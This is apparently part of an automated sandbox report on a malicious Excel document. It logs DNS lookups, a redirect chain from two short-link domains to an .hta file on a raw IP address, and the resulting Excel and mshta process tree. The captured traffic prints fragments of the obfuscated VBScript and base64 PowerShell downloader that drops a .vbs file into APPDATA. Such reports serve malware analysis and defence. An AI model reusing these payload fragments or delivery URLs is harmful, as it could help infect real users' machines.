            Feb 19, 2025 15:32:19.182751894 CET1.1.1.1192.168.2.40x3e64No error (0)sorkale.me172.67.143.130A (IP address)IN (0x0001)false
            Feb 19, 2025 15:32:20.592233896 CET1.1.1.1192.168.2.40x43a6No error (0)al4.dev188.114.97.3A (IP address)IN (0x0001)false
            Feb 19, 2025 15:32:20.592233896 CET1.1.1.1192.168.2.40x43a6No error (0)al4.dev188.114.96.3A (IP address)IN (0x0001)false
            • sorkale.me
            • al4.dev
            • 198.46.177.136
            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.449776198.46.177.136807520C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
            TimestampBytes transferredDirectionData
            Feb 19, 2025 15:32:21.478401899 CET260OUTGET /xampp/konno/ko/sweetbabygirllovedmeperfectlygivemebestloverevers.hta HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Connection: Keep-Alive
            Host: 198.46.177.136
            Feb 19, 2025 15:32:21.980067015 CET1236INHTTP/1.1 200 OK
            Date: Wed, 19 Feb 2025 14:32:21 GMT
            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
            Last-Modified: Wed, 19 Feb 2025 09:41:17 GMT
            ETag: "4100-62e7b8f251d34"
            Accept-Ranges: bytes
            Content-Length: 16640
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: application/hta
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 6d 75 6c 61 74 65 49 45 38 22 20 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 53 43 72 69 70 54 20 4c 61 6e 47 75 41 47 45 3d 22 56 42 73 63 72 69 50 54 22 3e 0d 0a 44 49 6d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 [TRUNCATED]
            Data Ascii: <!DOCTYPE html><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" ><html><body><SCripT LanGuAGE="VBscriPT">DIm SbPplpZUjBopyzjywjyKJYXjSQubXZXzzNAtvEDNLulZQfuONDuOYEJkfkSOmtXciKUJgDsoGyKoGCpkYyZcVxUceHuEHJvwHyYhGtTQGxOdkayhUCqwPMfhDQasxdUbJNOHljIRBXyoPGvanxtPVFSVssOYVJVnf ,
            Feb 19, 2025 15:32:21.980123997 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
            Data Ascii: IGEYjZXPrUpTYLZAkOMRLXsNURJbAVRJCgEIlDgKsEZAXaoeaIgxFgpxkNqXpXBkjJEAZmkfhmcnRWYMTIytOJtbghOGctqJjsBRGCFPrTuwMZymwOLVvhYnocZsVKFUlipUocNB
            Feb 19, 2025 15:32:21.980139017 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
            Data Ascii: =
            Feb 19, 2025 15:32:21.980161905 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
            Data Ascii: "ScRipT.sHElL"
            Feb 19, 2025 15:32:21.980178118 CET896INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
            Data Ascii: =
            Feb 19, 2025 15:32:21.980192900 CET1236INData Raw: 41 67 49 43 41 67 49 43 41 67 50 53 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 42 52 47 51 74 64 46 6c 77 52 53 41 67 49 43 41 67 49 43 41 67 49 43 41 67
            Data Ascii: AgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVSREVmSU5JdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTW9OLmRsbCIsICAgICAgICAgICAgICAgICAgICAgI
            Feb 19, 2025 15:32:21.980210066 CET1236INData Raw: 52 46 54 53 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 69 4a 45 56 75 56 6a 70 42 55 46 42 45 51 56 52 42 58 48 4e 33 5a 57 56 30 59 6d 46 69 65 57 64 70
            Data Ascii: RFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXHN3ZWV0YmFieWdpcmxsb3ZlZG1lcGVyZmVjdGx5ZnJvbWhlYXN3ZWV0LnZicyI='+[CHAr]34+'))')))"
            Feb 19, 2025 15:32:21.980226994 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 28 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
            Data Ascii: (
            Feb 19, 2025 15:32:21.980243921 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
            Data Ascii:
            Feb 19, 2025 15:32:21.980259895 CET328INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
            Data Ascii: (
            Feb 19, 2025 15:32:21.985389948 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 33 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
            Data Ascii: 34


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.449759104.21.87.1374437520C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
            TimestampBytes transferredDirectionData
            2025-02-19 14:32:19 UTC194OUTGET /GsWz6D HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Host: sorkale.me
            Connection: Keep-Alive
            2025-02-19 14:32:20 UTC1248INHTTP/1.1 302 Found
            Date: Wed, 19 Feb 2025 14:32:20 GMT
            Content-Type: text/plain; charset=utf-8
            Content-Length: 44
            Connection: close
            cross-origin-embedder-policy: require-corp
            cross-origin-opener-policy: same-origin
            cross-origin-resource-policy: same-origin
            location: https://al4.dev/Lj3tCg
            origin-agent-cluster: ?1
            referrer-policy: no-referrer
            strict-transport-security: max-age=15552000; includeSubDomains
            vary: Accept
            x-content-type-options: nosniff
            x-dns-prefetch-control: off
            x-download-options: noopen
            x-frame-options: SAMEORIGIN
            x-permitted-cross-domain-policies: none
            x-xss-protection: 0
            cf-cache-status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zZS8VjW12SsMk4n6QvzNvxx%2B3%2BdMDCxVX4a6BgHzgf5Rzk6C1k7tdTviOWxEgQOFpoGRtanScD7ENV5k7dzLnKdcCChTJpfLPOsMHO1J1YcXa8vUiuX8BRteUlKn"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 9146f7336f830f79-EWR
            alt-svc: h3=":443"; ma=86400
            server-timing: cfL4;desc="?proto=TCP&rtt=1668&min_rtt=1659&rtt_var=641&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2821&recv_bytes=776&delivery_rate=1683967&cwnd=244&unsent_bytes=0&cid=2a7c883c58e73072&ts=906&x=0"
            2025-02-19 14:32:20 UTC44INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 61 6c 34 2e 64 65 76 2f 4c 6a 33 74 43 67
            Data Ascii: Found. Redirecting to https://al4.dev/Lj3tCg


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.449770188.114.97.34437520C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
            TimestampBytes transferredDirectionData
            2025-02-19 14:32:21 UTC191OUTGET /Lj3tCg HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Connection: Keep-Alive
            Host: al4.dev
            2025-02-19 14:32:21 UTC1104INHTTP/1.1 302 Found
            Date: Wed, 19 Feb 2025 14:32:21 GMT
            Content-Type: text/plain; charset=utf-8
            Content-Length: 112
            Connection: close
            X-DNS-Prefetch-Control: off
            X-Frame-Options: SAMEORIGIN
            Strict-Transport-Security: max-age=15552000; includeSubDomains
            X-Download-Options: noopen
            X-Content-Type-Options: nosniff
            X-XSS-Protection: 1; mode=block
            Location: http://198.46.177.136/xampp/konno/ko/sweetbabygirllovedmeperfectlygivemebestloverevers.hta
            Vary: Accept
            cf-cache-status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rBG72uDCp%2F1iIqAxRAHI1PCBg7KV6kTsXi9Lw7fCV4%2FANYebCv3EOHSkIaJs%2BebgkK9rSgCtY8g6Q5S9GI%2FiXRPv466ioclkkjQkrL5QYVGLNMIMdLUjPCQd"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 9146f73c1cd67ca5-EWR
            alt-svc: h3=":443"; ma=86400
            server-timing: cfL4;desc="?proto=TCP&rtt=2237&min_rtt=2210&rtt_var=882&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2814&recv_bytes=773&delivery_rate=1203627&cwnd=245&unsent_bytes=0&cid=265148c5f3e39f88&ts=418&x=0"
            2025-02-19 14:32:21 UTC112INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 38 2e 34 36 2e 31 37 37 2e 31 33 36 2f 78 61 6d 70 70 2f 6b 6f 6e 6e 6f 2f 6b 6f 2f 73 77 65 65 74 62 61 62 79 67 69 72 6c 6c 6f 76 65 64 6d 65 70 65 72 66 65 63 74 6c 79 67 69 76 65 6d 65 62 65 73 74 6c 6f 76 65 72 65 76 65 72 73 2e 68 74 61
            Data Ascii: Found. Redirecting to http://198.46.177.136/xampp/konno/ko/sweetbabygirllovedmeperfectlygivemebestloverevers.hta


            Click to jump to process

            Click to jump to process

            Click to dive into process behavior distribution

            Click to jump to process

            Target ID:0
            Start time:09:31:25
            Start date:19/02/2025
            Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
            Wow64 process (32bit):true
            Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
            Imagebase:0x4a0000
            File size:53'161'064 bytes
            MD5 hash:4A871771235598812032C822E6F68F19
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            Target ID:5
            Start time:09:32:21
            Start date:19/02/2025
            Path:C:\Windows\SysWOW64\mshta.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\SysWOW64\mshta.exe -Embedding
            Imagebase:0x720000
            File size:13'312 bytes
            MD5 hash:06B02D5C097C7DB1F109749C45F3F505
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            Target ID:7
            Start time:09:32:28
            Start date:19/02/2025
            Path:C:\Windows\splwow64.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\splwow64.exe 12288
            Imagebase:0x7ff6cb6e0000
            File size:163'840 bytes
            MD5 hash:77DE7761B037061C7C112FD3C5B91E73
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            Target ID:9
            Start time:09:32:38
            Start date:19/02/2025
            Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
            Wow64 process (32bit):true
            Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Or_E7amento_US77.xla.xlsx"
            Imagebase:0x4a0000
            File size:53'161'064 bytes
            MD5 hash:4A871771235598812032C822E6F68F19
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Call Graph

            • Entrypoint
            • Decryption Function
            • Executed
            • Not Executed
            • Show Help
            callgraph 1 Error: Graph is empty

            Module: Sheet1

            Declaration
            LineContent
            1

            Attribute VB_Name = "Sheet1"

            2

            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

            3

            Attribute VB_GlobalNameSpace = False

            4

            Attribute VB_Creatable = False

            5

            Attribute VB_PredeclaredId = True

            6

            Attribute VB_Exposed = True

            7

            Attribute VB_TemplateDerived = False

            8

            Attribute VB_Customizable = True

            Module: Sheet2

            Declaration
            LineContent
            1

            Attribute VB_Name = "Sheet2"

            2

            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

            3

            Attribute VB_GlobalNameSpace = False

            4

            Attribute VB_Creatable = False

            5

            Attribute VB_PredeclaredId = True

            6

            Attribute VB_Exposed = True

            7

            Attribute VB_TemplateDerived = False

            8

            Attribute VB_Customizable = True

            Module: Sheet3

            Declaration
            LineContent
            1

            Attribute VB_Name = "Sheet3"

            2

            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

            3

            Attribute VB_GlobalNameSpace = False

            4

            Attribute VB_Creatable = False

            5

            Attribute VB_PredeclaredId = True

            6

            Attribute VB_Exposed = True

            7

            Attribute VB_TemplateDerived = False

            8

            Attribute VB_Customizable = True

            Module: ThisWorkbook

            Declaration
            LineContent
            1

            Attribute VB_Name = "ThisWorkbook"

            2

            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

            3

            Attribute VB_GlobalNameSpace = False

            4

            Attribute VB_Creatable = False

            5

            Attribute VB_PredeclaredId = True

            6

            Attribute VB_Exposed = True

            7

            Attribute VB_TemplateDerived = False

            8

            Attribute VB_Customizable = True

            Reset < >